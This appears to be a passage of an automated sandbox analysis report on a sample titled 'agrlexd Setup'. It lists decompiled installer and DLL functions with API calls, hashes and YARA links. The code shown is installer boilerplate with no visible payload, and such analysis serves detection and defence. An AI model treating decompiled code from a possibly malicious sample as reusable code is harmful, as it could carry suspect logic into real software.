                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 5a51fec70e822ab97a907fc9f4630826089d5357ddb880fe10a7df9c90fe9b6c
                                                  • Instruction ID: cef32394d564b49b28bd0550dd029cfaefc6f4b618f5e1fbbf760c0b871ed78f
                                                  • Opcode Fuzzy Hash: 5a51fec70e822ab97a907fc9f4630826089d5357ddb880fe10a7df9c90fe9b6c
                                                  • Instruction Fuzzy Hash: 68B09231044218ABEB002BD1DC49B597FADEB04792F80C010F60D440A1CF7297119B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                  0x00402689
                                                  0x0040269d
                                                  0x004026a8
                                                  0x004026a9
                                                  0x004027e4
                                                  0x0040268b
                                                  0x0040268b
                                                  0x0040268d
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                  • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                  • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                  • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100098E2, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E100098E2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x1001dc00 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                                  0x100098e2
                                                  0x100098ea
                                                  0x100098f6

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(10012871,10019298,00000008,10012A49,?,00000001,?,100192B8,0000000C,10012B19,?,00000001,?), ref: 100098E2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 892fe3a679600de6279efcf4dc97abde6e27e15d1d8bd9374cda42a1acf4df8b
                                                  • Instruction ID: 083816bb16d1f4622f9b208004f2cfaef69d87b1fe187af0ee22c9ad6aeafba1
                                                  • Opcode Fuzzy Hash: 892fe3a679600de6279efcf4dc97abde6e27e15d1d8bd9374cda42a1acf4df8b
                                                  • Instruction Fuzzy Hash: BFB012B03012238BE7081B3D9CD410D35D46708201355C03EF003C1160EF30C510EB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10006712, Relevance: .3, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 5c865827c68e1b219647e12cd50d32c51221bdbdce275a240fc6db8470883059
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 73C176322095A309FB4DCA79C83417EBAE2DF966F1327476DD4B2DB1C8EE20C564D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10006B47, Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 6f6fdc43ee3dc17ba0876a3ab91032250445b4f58983b54f03baf4b6c0722ecc
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 24C184362055A30AFB5DC679CC3417EBAE2EB966F1327076DD4B2DB1C9EE20C524D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100062DD, Relevance: .3, Instructions: 331COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction ID: 422242e7b041be60de79b66a4d9df9c01bcfb565f57f485e2ac8fc121162dfd7
                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction Fuzzy Hash: 77C185322055A30AFB4DC6798C3417EBAE2EB966F1327176DD8B3DB1C8EE50C524D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001AA08, Relevance: .3, Instructions: 326COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea6f257cb4b2087e5fc218e518595d1f4700e3bd746730ebecf27f69ad9e87f2
                                                  • Instruction ID: 5435598de88e1e158b2b9a307104a25b78fa31e96880acb7e492d392d6c8bba5
                                                  • Opcode Fuzzy Hash: ea6f257cb4b2087e5fc218e518595d1f4700e3bd746730ebecf27f69ad9e87f2
                                                  • Instruction Fuzzy Hash: 4FE1041485D2EDADDB06CBF945657FCBFB05E26102F0845CAE0E5E6283C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10005EC5, Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 044945ebe7989c4ce5caa4e0b8a3ddf809e318914ddd7a9758197c6565f7986c
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 26C184322054A309FB4DC679C83457FBBE2AB966F132B176DD4B2CB1D9EE20C564D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001AA17, Relevance: .3, Instructions: 318COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e66085aeb058fd5618581dbb9bf22c3a2bc9f7f74f6ce4ea64a309cc709381a4
                                                  • Instruction ID: b59fe0e25b9f78f9102ef9521da59b427517d0ad818aba901910eef6c2fea0af
                                                  • Opcode Fuzzy Hash: e66085aeb058fd5618581dbb9bf22c3a2bc9f7f74f6ce4ea64a309cc709381a4
                                                  • Instruction Fuzzy Hash: AEE1F31495D2EDADDB06CBF945613FCBFB05D26102F0845CAE0E5E6283C53A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A616, Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                  • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                                                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                  • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A706, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                  • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                                                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                  • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A744, Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001A6C7, Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x82d0fc
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x82b77c
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x825438
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                                                  0x00403fac
                                                  0x004040d2
                                                  0x0040412e
                                                  0x00404132
                                                  0x00404209
                                                  0x0040420b
                                                  0x0040420b
                                                  0x00404211
                                                  0x00404211
                                                  0x00404214
                                                  0x00000000
                                                  0x0040421b
                                                  0x00404140
                                                  0x00404142
                                                  0x0040414c
                                                  0x00404157
                                                  0x0040415a
                                                  0x0040415d
                                                  0x00404168
                                                  0x0040416b
                                                  0x00404172
                                                  0x00404180
                                                  0x00404198
                                                  0x004041a0
                                                  0x004041ab
                                                  0x004041bb
                                                  0x004041bd
                                                  0x004041bd
                                                  0x00404172
                                                  0x004041c7
                                                  0x00000000
                                                  0x004041d2
                                                  0x004041d6
                                                  0x004041e7
                                                  0x004041e7
                                                  0x004041ed
                                                  0x004041fb
                                                  0x004041fb
                                                  0x00000000
                                                  0x004041ff
                                                  0x004041c7
                                                  0x004040dd
                                                  0x00000000
                                                  0x004040f1
                                                  0x004040f7
                                                  0x004040fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00404122
                                                  0x00404124
                                                  0x00404129
                                                  0x00000000
                                                  0x00404129
                                                  0x004040dd
                                                  0x00403fb2
                                                  0x00403fb5
                                                  0x00403fba
                                                  0x00403fbc
                                                  0x00403fcb
                                                  0x00403fcb
                                                  0x00403fcd
                                                  0x00403fd2
                                                  0x00403fd5
                                                  0x00403fd7
                                                  0x00403fdc
                                                  0x00403fe5
                                                  0x00403feb
                                                  0x00403ff7
                                                  0x00403ffa
                                                  0x00404003
                                                  0x00404008
                                                  0x0040400b
                                                  0x00404010
                                                  0x00404027
                                                  0x0040402e
                                                  0x00404041
                                                  0x00404044
                                                  0x00404059
                                                  0x0040405b
                                                  0x00404060
                                                  0x00404065
                                                  0x0040406a
                                                  0x0040406a
                                                  0x00404079
                                                  0x00404088
                                                  0x0040408a
                                                  0x004040a0
                                                  0x004040af
                                                  0x004040b1
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404027
                                                  • GetDlgItem.USER32 ref: 0040403B
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404059
                                                  • GetSysColor.USER32(?), ref: 0040406A
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404079
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404088
                                                  • lstrlenA.KERNEL32(?), ref: 00404092
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A0
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040AF
                                                  • GetDlgItem.USER32 ref: 00404112
                                                  • SendMessageA.USER32(00000000), ref: 00404115
                                                  • GetDlgItem.USER32 ref: 00404140
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404180
                                                  • LoadCursorA.USER32 ref: 0040418F
                                                  • SetCursor.USER32(00000000), ref: 00404198
                                                  • ShellExecuteA.SHELL32(0000070B,open,.B,00000000,00000000,00000001), ref: 004041AB
                                                  • LoadCursorA.USER32 ref: 004041B8
                                                  • SetCursor.USER32(00000000), ref: 004041BB
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041E7
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: N$open$.B
                                                  • API String ID: 3615053054-720656042
                                                  • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                  • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                  • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                  • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003510, Relevance: 33.3, APIs: 22, Instructions: 280fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                                                  • String ID:
                                                  • API String ID: 2750380209-0
                                                  • Opcode ID: ac665aa66254fa9da2ad4e6231a2908bc470f2390a27bee0ed3265fa66ee714f
                                                  • Instruction ID: 50c05379d510101be5601c0b3c60cae8e16084763878c58b6d5e7ab32d650b67
                                                  • Opcode Fuzzy Hash: ac665aa66254fa9da2ad4e6231a2908bc470f2390a27bee0ed3265fa66ee714f
                                                  • Instruction Fuzzy Hash: 08E18FB49087418FE761DF28C58875BBBE4FB84354F108A2EE89987394DB749548CF93
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x825438
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "agrlexd Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0xa03f6
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
